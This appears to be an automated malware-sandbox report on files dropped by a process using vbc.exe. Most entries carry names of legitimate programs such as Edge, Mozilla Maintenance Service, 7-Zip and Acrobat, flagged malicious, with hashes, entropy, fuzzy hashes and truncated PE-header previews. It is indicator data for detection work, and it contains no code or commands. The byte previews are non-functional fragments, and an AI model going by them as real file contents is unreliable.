                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):2062336
                                                                                                                                                                    Entropy (8bit):7.094403187077111
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:49152:MWnm5iOMkjmQWkVbRVlbnXf9gPTTW7H1GXC:DsMkjRVlbnP9WXW7H6C
                                                                                                                                                                    MD5:8CE5733E26180EE59EE5B42B6CEAC54C
                                                                                                                                                                    SHA1:51B50504C07A4DC4E611CF50E1B2898E60B44FCC
                                                                                                                                                                    SHA-256:62E93DD8DC62586BBF31076BBE9DA7CA69D47E002F0ABCCFC7AD90B54ED45469
                                                                                                                                                                    SHA-512:9D34B75CD34A61E67DAED3ECBBB5BC9B0563A82F3A4322EB071A47B0D2EBBF0FCC01B635ED67E2C9455991A2DE04B1E9C34FB0554FA1B77455BC15FA2703A5E7
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......h...4......P..........@.............................. ........... .................................................Z...................H......................8.......................(...`...@...........(...@............................text....g.......h.................. ..`.rdata...).......*...l..............@..@.data...............................@....pdata..H...........................@..@.00cfg..0....P.......H..............@..@.gxfg...p-...`.......J..............@..@.retplne.............x...................tls.................z..............@...CPADinfo8............|..............@..._RDATA..\............~..............@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...................................................................................................

                                                                                                                                                                    C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1801216
                                                                                                                                                                    Entropy (8bit):7.163082305650498
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:49152:4wNPdQO7BJTfmEQRVlbnXf9gPTTW7H1GXC:fOO7Pm7RVlbnP9WXW7H6C
                                                                                                                                                                    MD5:BD44E99F0421C75E87FA097C692B9794
                                                                                                                                                                    SHA1:F58FB04AAD9E56A6CEEA2AE229D6207406F625ED
                                                                                                                                                                    SHA-256:A14A16AF2463F7196FF2772C7DFDDFA33E4840AF9CE3D56563BE7CF3114F4F91
                                                                                                                                                                    SHA-512:9F13BD5FEC77475AC9E47C5A46E58CBEA07FD6D41E6CACE73B858CD5CFFC02127D4D0F2F64A03E593766E2D04718D9D3E1E43F9153C81E99E8E1640744A974CC
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......*...r......P..........@.......................................... .........................................C...........................T.......................T.......................(....R..@............"..8.......`....................text....(.......*.................. ..`.rdata.......@......................@..@.data...@...........................@....pdata..T...........................@..@.00cfg..0....@.......N..............@..@.gxfg....,...P...,...P..............@..@.retplne.............|...................tls.................~..............@..._RDATA..\...........................@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...........................................................................................................................................

                                                                                                                                                                    C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1847808
                                                                                                                                                                    Entropy (8bit):7.142227376090218
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:49152:iD2VmAyiwIb8boQ7RVlbnXf9gPTTW7H1GXC:i2V7wIbyRVlbnP9WXW7H6C
                                                                                                                                                                    MD5:816164B1FD43DE7CBB52E3CC95549E52
                                                                                                                                                                    SHA1:2228C52CA72C024293B2402D5C095DA5758DD6C0
                                                                                                                                                                    SHA-256:2CB9C9BD9816CE7A8CDD2199E64FA435D37238D654B2CE4B04D76EA379E6E3B9
                                                                                                                                                                    SHA-512:F6F622D7C4EB974B4D36712F35733D30D9F3FD8876F65D652139AE2328A4DC7568E2F9EA83F7E88EDD365F48B2467B778717759757E6FC242A1900F3D20F51D8
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..................p.........@.............................p....... .... .........................................2...........d....`..8....P..........................8......................(.......@...............X...(........................text...4........................... ..`.rdata..|...........................@..@.data................r..............@....pdata.......P.......n..............@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne..... ...........................tls.........0.......0..............@..._RDATA..\....@.......2..............@..@malloc_h.....P.......4.............. ..`.rsrc...8....`.......6..............@..@.reloc.......p.......B..............@...........................................................................................................................................

                                                                                                                                                                    C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1801216
                                                                                                                                                                    Entropy (8bit):7.16308845381576
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:49152:AwNPdQO7BJTfmEQRVlbnXf9gPTTW7H1GXC:XOO7Pm7RVlbnP9WXW7H6C
                                                                                                                                                                    MD5:9B0892FE831FC6F5FDDF1F0E85C0D6A5
                                                                                                                                                                    SHA1:DCF71861ADD9E38F1B6D9164DB1C8E54AE91676A
                                                                                                                                                                    SHA-256:4F901E9D9D201508CF1292361B427CDEF4CF2B59B99FFF380961C5177377BD79
                                                                                                                                                                    SHA-512:C917694D9BD8D18360B598FA638314EBD4DD400ADD32432E85312F1F59A336B0AE85212D3019878FE008368280911D262595ADBAE4990D0D1C8BD210CED3BCC9
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......*...r......P..........@.......................................... .........................................C...........................T.......................T.......................(....R..@............"..8.......`....................text....(.......*.................. ..`.rdata.......@......................@..@.data...@...........................@....pdata..T...........................@..@.00cfg..0....@.......N..............@..@.gxfg....,...P...,...P..............@..@.retplne.............|...................tls.................~..............@..._RDATA..\...........................@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...........................................................................................................................................

                                                                                                                                                                    C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1325568
                                                                                                                                                                    Entropy (8bit):5.133974544311414
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:t4lbht6BHERVldlnXfH9gPwCn7vOb7HHcp/CGXQp:OlNtqHERVlbnXf9gPTTW7H1GXC
                                                                                                                                                                    MD5:E073677CAC4AA71E2F80CFC741C7AF98
                                                                                                                                                                    SHA1:81149CDE7AF58CA5458ABC9318F311F3099BA664
                                                                                                                                                                    SHA-256:19C3A2FA0B98D998BC74309BBBE60A49042DCF071F4F04C57F8A206B0E41141F
                                                                                                                                                                    SHA-512:6F54076990DCAA1524F6D589A219F0F130319708F9A1A75A3D6D6D3974EC8D22F5AC5ED3E80A1A22D1FCB4F2EA4C2B089D9C14C0FC3F1E8AC648BE924DC7610C
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......o.y.+c..+c..+c..?...!c..?....c..?...9c..I...:c..I...8c..I....c..?...*c..?....c..+c..Xc......)c.....*c..+c..|c......*c..Rich+c..........................PE..L...B(.d.................^..........@........p....@..................................,......................................H...<........q..........................pu..p...........................X...@...............@....k..`....................text...`\.......^.................. ..`.data........p.......b..............@....idata...............l..............@..@.didat...............v..............@....rsrc....q.......r...x..............@..@.reloc...`...0...P..................@...........................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1221120
                                                                                                                                                                    Entropy (8bit):5.130783208253799
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:QIxkTBVQRVldlnXfH9gPwCn7vOb7HHcp/CGXQp:5xk1VQRVlbnXf9gPTTW7H1GXC
                                                                                                                                                                    MD5:7E3E271E175A55FA9C9242928CE46BDB
                                                                                                                                                                    SHA1:D82B7820F8A808D12830CBE2947F4911B09FFBC6
                                                                                                                                                                    SHA-256:49618736DDF25C67BBC5B91D4F676973DA6F6F232A1C247F80C6ECA3EB7D9C93
                                                                                                                                                                    SHA-512:3D14239EC8B61DE60F64C048056E2A74444E244E5A66690B77E46DE0DE3D98D996C9AC625D8FAA370FEE693528ECF016B8B59D9BEE004B09AC7009832217E017
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,.B...B...B...A...B...G...B...F...B...G...B...F...B...A...B...C...B...C..B...G...B......B......B...@...B.Rich..B.........................PE..L...8(.d..........................................@.................................|.......................................x...(....`..X3..............................p...............................@.......................@....................text............................... ..`.rdata...`.......b..................@..@.data........0......................@....didat.......P......................@....rsrc...X3...`...4..................@..@.reloc...`.......P...R..............@...................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1335296
                                                                                                                                                                    Entropy (8bit):5.230540959114114
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:Ocssmr/RVldlnXfH9gPwCn7vOb7HHcp/CGXQp:vbuRVlbnXf9gPTTW7H1GXC
                                                                                                                                                                    MD5:036EEE183226BDBB4FF17DDE3671650B
                                                                                                                                                                    SHA1:0FC9E7452C969677F3B356920D5E2CBDAC537860
                                                                                                                                                                    SHA-256:50DF77D5CA011E6D8FC5DD9659F47F6F6E0052002EC957833198AB5CE34AAC6F
                                                                                                                                                                    SHA-512:371AA850437EFF0DD47D723336DA34D6CF04C1A20A01CB0F78F18133CB0440830E00C12A1CCF6DE4E68DF60B99A3E347CBB38D31B1FF7A0B24291AED8A6C8E3B
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............O.@.O.@.O.@.$.A.O.@.$.A|O.@.7.A.O.@.7.A.O.@.7.A.O.@W6.A.O.@.$.A.O.@.$.A.O.@.$.A.O.@.O.@IN.@W6.A.O.@W6.@.O.@W6.A.O.@Rich.O.@........PE..d...@(.d.........."......n...........].........@.....................................@.... .....................................................(............@..........................p.......................(...p,..@...............0............................text....l.......n.................. ..`.rdata..8z.......|...r..............@..@.data...P3..........................@....pdata.......@......................@..@.didat.......`......................@..._RDATA.......p......................@..@.rsrc...............................@..@.reloc...P.......@... ..............@...........................................................................................................................................................

                                                                                                                                                                    C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1383936
                                                                                                                                                                    Entropy (8bit):5.331558193760986
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:f03cT++foSBWU2YxhkgKRVldlnXfH9gPwCn7vOb7HHcp/CGXQp:83cK+foQWU2YnPKRVlbnXf9gPTTW7H1B
                                                                                                                                                                    MD5:DAB3FF8CF829D86E91E8A4905CDA6F21
                                                                                                                                                                    SHA1:BAACA46C9F938AB13F56FDFDD87B8EFDD8E3E270
                                                                                                                                                                    SHA-256:A548ED298AD18C9C8D14BC60AADAD5B77DE5DCA9AE49358B23FD448DA23E084C
                                                                                                                                                                    SHA-512:13E05050770E2F2F764836DC232F9970904213057C0CB123A795E552721B7F867A2894F7F80A98B9F620924A9A90AF027D6A09F4BF2749E952E0A8FA8D4127F7
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............wU..wU..wU.tT..wU.rTg.wU..sT..wU..tT..wU..rT..wU.sT..wU.qT..wU.vT..wU..vUQ.wUK.~T..wUK..U..wUK.uT..wURich..wU........PE..L...B(.d............................p.............@.................................U|.......................................y..........H3...........................g..p....................g..........@....................x.......................text............................... ..`.rdata...z.......|..................@..@.data....'...........z..............@....didat..$...........................@....rsrc...H3.......4..................@..@.reloc...p.......`..................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1221120
                                                                                                                                                                    Entropy (8bit):5.1308300418957735
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:qbBRzBgqRVldlnXfH9gPwCn7vOb7HHcp/CGXQp:sBRVgqRVlbnXf9gPTTW7H1GXC
                                                                                                                                                                    MD5:5F7DB2CB7CA8BFA9F63DF3A56AA3958A
                                                                                                                                                                    SHA1:00F4D6D552203F0F5B6DAAC0D9C86FF9CD955304
                                                                                                                                                                    SHA-256:316132C41D9E78B4C878CDAD48373DDB5130A841A4109A2BC799F15F5C1F45A7
                                                                                                                                                                    SHA-512:2985ED5057A7FF1C708B2FC23980C9CA3E606FC599FD6B09C61B080A17AA57ED228AA31225849EFE12256520BC2AB9BF8DAC74CD688B123C9E68DADFA33B496B
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,.B...B...B...A...B...G...B...F...B...G...B...F...B...A...B...C...B...C..B...G...B......B......B...@...B.Rich..B.........................PE..L...7(.d..........................................@.............................................................................(....`..X3..............................p...............................@...................<...@....................text............................... ..`.rdata...`.......b..................@..@.data........0......................@....didat.......P......................@....rsrc...X3...`...4..................@..@.reloc...`.......P...R..............@...................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):2168832
                                                                                                                                                                    Entropy (8bit):7.9387402772425615
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:49152:Ry53w24gQu3TPZ2psFkiSqwozoRVlbnXf9gPTTW7H1GXC:RyFQgZqsFki+ozoRVlbnP9WXW7H6C
                                                                                                                                                                    MD5:9665D6FA54C78031B0B9F8DF815C8E73
                                                                                                                                                                    SHA1:7C2A55D94D7BB38C168DA75DF440B110A5338218
                                                                                                                                                                    SHA-256:AA319B1A0E6D829CD3258111F4CF9CBB0D916179B5A5225DB4D0065226A9286D
                                                                                                                                                                    SHA-512:50DD0B5F826951DCE31595D3E7CCAEF975D3100BD18293DC7FA3FE3E9EBFD5F69CBB0590AE0500C12A6E2DCDFDD5821A8E63966B491CBA43AAAFDBDFADA6818F
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d..[ e.. e.. e..4...+e..4....e..B...1e..B...4e......-e..B....e..4...3e..4...!e..4...-e.. e...e....@.!e.. e(.ve......!e..Rich e..................PE..L....(.d............................ }............@..........................p!.....~F!......................................?..x....................................1..p....................1..........@...............H...T>..`....................text...*........................... ..`.rdata..............................@..@.data...,....P.......8..............@....didat..,....p.......B..............@....rsrc................D..............@..@.reloc.......p.......(..............@...................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.log

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):3141
                                                                                                                                                                    Entropy (8bit):4.908053095817471
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:QU/zIRJpixRuyKDym9ggjIzI2yLWSvEyeyDKcwyqq+UpopUJNyniKyD:OObvEa4
                                                                                                                                                                    MD5:97027D07AAB09F42442BD15A5B65EECD
                                                                                                                                                                    SHA1:A28D161997569F362DC30EB9210B56E41BC4C917
                                                                                                                                                                    SHA-256:ACF0B361F026567ECA9A5A5886AC663D0053C600BC36F590D386493F37D6382C
                                                                                                                                                                    SHA-512:BCF5272F60FA1660C2B0C7BD1FCADBE29F2124F83CA243EE381E64C90FDC3CC3D29DE385834254C6C33A5ACFF853C5B0C521BACA53CAAFD4C7E58E8EE16C332C
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:2024-11-28 16:44:26-0500: Disabled unneeded token privilege: SeAssignPrimaryTokenPrivilege...2024-11-28 16:44:26-0500: Disabled unneeded token privilege: SeAuditPrivilege...2024-11-28 16:44:26-0500: Disabled unneeded token privilege: SeBackupPrivilege...2024-11-28 16:44:26-0500: Disabled unneeded token privilege: SeCreateGlobalPrivilege...2024-11-28 16:44:26-0500: Disabled unneeded token privilege: SeCreatePagefilePrivilege...2024-11-28 16:44:26-0500: Disabled unneeded token privilege: SeCreatePermanentPrivilege...2024-11-28 16:44:26-0500: Disabled unneeded token privilege: SeCreateSymbolicLinkPrivilege...2024-11-28 16:44:26-0500: Could not disable token privilege value: SeCreateTokenPrivilege. (1300)..2024-11-28 16:44:26-0500: Disabled unneeded token privilege: SeDebugPrivilege...2024-11-28 16:44:26-0500: Could not disable token privilege value: SeEnableDelegationPrivilege. (1300)..2024-11-28 16:44:26-0500: Disabled unneeded token privilege: SeImpersonatePrivilege...2024-11-28 16:44:2

                                                                                                                                                                    C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1356800
                                                                                                                                                                    Entropy (8bit):5.347851035488352
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:gQVTZu0JtsqjnhMgeiCl7G0nehbGZpbD:fVTZucDmg27RnWGj
                                                                                                                                                                    MD5:644513105C5FAA8D93951A3690E4014C
                                                                                                                                                                    SHA1:CE87FC435B4B5D96F9092FB047E2A6F76DA6F265
                                                                                                                                                                    SHA-256:3D12C6189F0A759291474539A7F41498513F240C67F2BF514AD898981F8CD61A
                                                                                                                                                                    SHA-512:0009B398D379FC3ED0E7C445813F43ECEAF59E6487D0770AD1BE4F2E7A96829ADB326FE4C76DBD394523E2E314A90E9C952D73295EC556F803E6108460C79CA2
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......R...$.................@.............................P.......t.... .................................................h&..................`....................$..........................(....p..8............,...............................text...FQ.......R.................. ..`.rdata.......p.......V..............@..@.data...4#...`.......<..............@....pdata..`............J..............@..@.00cfg..(............d..............@..@.tls.................f..............@....voltbl.*............h.................._RDATA...............j..............@..@.rsrc................l..............@..@.reloc...P.......@...t..............@...........................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files\7-Zip\7z.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1683968
                                                                                                                                                                    Entropy (8bit):5.623141229656673
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:C+gkESfh4CoKsqjnhMgeiCl7G0nehbGZpbD:HgkE+SYDmg27RnWGj
                                                                                                                                                                    MD5:C556C9415156168A9241A1485ABFCD1B
                                                                                                                                                                    SHA1:24EFA76A174A08EE7392BB1ADA1C1316844CEFF3
                                                                                                                                                                    SHA-256:5157F169BC744716E8E47C95919383894BD3CC1C4FDF080000B378ACE8EF8161
                                                                                                                                                                    SHA-512:385FBCFBF41D4836A52EB006A877962D08559FC30974B662725DE660E98783488B2B57FAF216595BACF1E94555546E10DD0CE60EC2A5A5E89E743B21E12B425B
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............xaX.xaX.xaX...X.xaX...X.xaX.x`XlxaX...X.xaX..eY.xaX...X.xaX`.bY.xaX...X.xaX...X.xaXRich.xaX........................PE..d....\.d.........."...........................@.............................. ............ .....................................................x............@...q......................................................................0............................text...v........................... ..`.rdata..T...........................@..@.data....-..........................@....pdata...q...@...r..................@..@.rsrc................j..............@..@.reloc...P.......@...r..............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files\7-Zip\7zFM.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1532416
                                                                                                                                                                    Entropy (8bit):7.096669432275988
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:dBpDRmi78gkPXlyo0GtjrVsqjnhMgeiCl7G0nehbGZpbD:XNRmi78gkPX4o0GtjNDmg27RnWGj
                                                                                                                                                                    MD5:148394E4EFBAB807A0FF714F17532C36
                                                                                                                                                                    SHA1:280681E9A5C1FBEDC59629950CE77BF362A11644
                                                                                                                                                                    SHA-256:7DDF905D18DF7DA9E313A2C6F72B34EE08D09F7C661F086B08C3212105E2DD28
                                                                                                                                                                    SHA-512:277AE985332AC84BF185D35BC41D7E28AA1E8B0AA04D1A22AD838CF66C3FC358B1488082BED716876AC12E003CF756E9830D2A7EDB802ADC324F4329792B8F28
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........\..2..2..2.0.\..2..I..2..3..2..O..2..\.D.2...6..2.._..2..N..2..J..2.Rich.2.........................PE..d....\.d.........."......b...8......Pi........@........................................... .................................................P................... .......................................................................(.......@....................text....a.......b.................. ..`.rdata...i.......j...f..............@..@.data...............................@....pdata.. ...........................@..@.rsrc...............................@..@.reloc...............r..............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files\7-Zip\7zG.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1282048
                                                                                                                                                                    Entropy (8bit):7.22907029371895
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:MLOS2oTPIXVKsqjnhMgeiCl7G0nehbGZpbD:U/TlDmg27RnWGj
                                                                                                                                                                    MD5:064B8EDA98952251C0F55816C981877C
                                                                                                                                                                    SHA1:C44E2E7D85D3A52D883D1C9A3CF69ABB27322347
                                                                                                                                                                    SHA-256:DC0CDD928F3C6BAB25553544ABABE8B66D06EF2C856C164C7008662DD0B03C94
                                                                                                                                                                    SHA-512:920E10B730272E7BAD70DF70236CCE59D8346080BE3853FA2C4E2465F38C17CD80803DCAEB7EA6B0D637DBB73EF6D7A032061356886E83A1EDD6918285F59100
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;.VS.y8..y8..y8...C.jy8..y9..y8...E.}y8...V..y8.i.<.~y8...U.ky8...;.~y8...D.~y8...@.~y8.Rich.y8.........PE..d....\.d.........."......&..........."........@........................................... ..............................................................d...........................................................................@...............................text...4$.......&.................. ..`.rdata..Ts...@...t...*..............@..@.data...83..........................@....pdata..............................@..@.rsrc....d.......f...:..............@..@.reloc..............................@...........................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files\7-Zip\Uninstall.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1145344
                                                                                                                                                                    Entropy (8bit):5.031214663596253
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:k1MXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:k1MsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                    MD5:962F036055C8700601A80EB8D55F4D33
                                                                                                                                                                    SHA1:57D95363E945D5B4A25205D185BD0ED80674FE87
                                                                                                                                                                    SHA-256:D31B10D4DEDEC81055FF085FF635D4B939061C6D7F813541F9DCB33976788765
                                                                                                                                                                    SHA-512:AF10E62110189CBCB316C2D45C0C1AF2595A74F63B6E9E8ADCAA762C5836C1671BEFE1E3FDC06F90553F47050A4A013BFE175BC6E24E08E5EC1983281F72D3E8
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.6...X...X...X.x.R...X..V...X.x.\...X......X...Y.W.X......X.!.R...X...^...X.Rich..X.................PE..L...pN.d........../..........@......f!.......0....@.................................Lu......................................$9.......`...............................................................................0...............................text............................... ..`.rdata.......0......................@..@.data...X....@.......(..............@....rsrc....`...`...P...*..............@...........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1222656
                                                                                                                                                                    Entropy (8bit):6.712053675041287
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:tRudzvXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:tAdzvsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                    MD5:B607159DB00D071ECD792434722F4680
                                                                                                                                                                    SHA1:B75837359137A1170E37D859FAF03F03A9C41A63
                                                                                                                                                                    SHA-256:AA3BAE970CF1F9DCA43BB455E8CB0546111F71C6BCADC2270B1CBDAF7CB5FF3B
                                                                                                                                                                    SHA-512:3E2AC8099BACE2274B42AB702A0E505483082CBFB71E9B919823F358A710921AD3635CF91DAD6F4989BA244E53C77F47E80D5D4BF4D173BDE7F5886D9C2C34EF
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........U...4.F.4.F.4.F.LEF.4.FE@.G.4.FE@.G.4.FE@.G.4.FE@.G.4.F._.G.4.F.4.F%4.FG@.G.4.FG@)F.4.F.4AF.4.FG@.G.4.FRich.4.F................PE..d......d.........."......6.....................@....................................=9.... .....................................................|....P..h........9.....................p.......................(...P...8............P...............................text....4.......6.................. ..`.rdata..>....P.......:..............@..@.data...............................@....pdata...9.......:..................@..@.rsrc...h....P......................@..@.reloc..............................@...................................................................................................................................................................................................................................................

